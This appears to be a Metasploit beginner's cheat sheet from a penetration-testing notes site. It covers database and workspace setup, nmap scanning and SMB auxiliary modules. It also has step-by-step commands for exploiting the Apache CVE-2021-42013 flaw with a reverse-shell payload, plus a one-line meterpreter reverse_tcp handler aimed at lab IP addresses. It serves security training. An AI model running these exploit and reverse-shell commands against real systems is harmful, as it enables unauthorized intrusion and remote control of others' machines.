101

Setup

Database

Metasploit Framework (MSF) in Kali Linux doesn't start its database (PostgreSQL) by default, but it’s useful for storing target data and tracking exploits.

# Initialize database
sudo msfdb init

# Start PostgreSQL service
sudo service postgresql start

# Launch MSF Console
sudo msfconsole -q

# Check database connection
msf6 > db_status
[*] Connected to msf. Connection type: postgresql.

Workspaces

MSF uses workspaces to separate different tests and avoid data mix-up.

# Check current workspace
msf6 > workspace

# Create a new workspace
msf6 > workspace -a test_ws
[*] Added workspace: test_ws

# Switch to a specific workspace
msf6 > workspace test_ws
[*] Workspace: test_ws

# Check current workspace again
msf6 > workspace
  default
* test_ws

Scan results will now be saved in the selected workspace.

# Scan target
msf6 > db_nmap -A 192.168.50.202

# List discovered hosts
msf6 > hosts

# List discovered services
msf6 > services

# List hosts with port 445 (e.g., SMB service)
msf6 > services -p 445

Modules

MSF includes modules for various purposes, categorized for ease of use.

# List module categories
msf6 > show -h

Auxiliary

Auxiliary modules perform tasks like scanning, fuzzing, and enumeration.

# List all auxiliary modules
msf6 > show auxiliary

# Filter modules by type
msf6 > search type:auxiliary smb

# Filter by name (e.g., SMB version scanner)
msf6 > search smb_version

# Use a specific module
msf6 > use 0

# View module info
msf6 auxiliary(scanner/smb/smb_version) > info

# List module options
msf6 auxiliary(scanner/smb/smb_version) > show options

# List required options
msf6 auxiliary(scanner/smb/smb_version) > show missing

# Set required options
msf6 auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.50.202

# Run module
msf6 auxiliary(scanner/smb/smb_version) > run

Exploit

Exploit modules in MSF target specific vulnerabilities in applications or services. Key Features:

Database Integration: Automatically tracks targets, services, and vulnerabilities.
Reliability: Repeatable sessions for stable access.
Payload Flexibility: Users can select payloads based on the exploit.

# Create a workspace for exploits
msf6 > workspace -a exploits
msf6 > workspace exploits

# Set target host
msf6 > setg RHOSTS 192.168.225.16

# Search for CVE-2021-42013 exploit
msf6 > search CVE-2021-42013

# Select exploit module
msf6 > use 0

# Configure payload and options
msf6 exploit(multi/http/apache_normalize_path_rce) > set LHOST 192.168.45.242
msf6 exploit(multi/http/apache_normalize_path_rce) > set SSL false
msf6 exploit(multi/http/apache_normalize_path_rce) > set RPORT 80
msf6 exploit(multi/http/apache_normalize_path_rce) > set payload linux/x64/shell_reverse_tcp

# Run exploit
msf6 exploit(multi/http/apache_normalize_path_rce) > run

Sessions & Jobs

Sessions manage interactions with successfully exploited targets. Jobs run in the background.

# Background the current session
^Z
Background session 1? [y/N] y

# List active sessions
msf6 > sessions -l

# Interact with a session
msf6 > sessions -i 1

# Close a session
msf6 > sessions -k 1

Inline Commands

$ msfconsole -q -x "use exploit/multi/handler; set PAYLOAD linux/x64/meterpreter/reverse_tcp; set LHOST 192.168.45.157; set LPORT 9999; exploit -j"

PreviousMetasploit NextPayloads

Last updated 8 months ago

Was this helpful?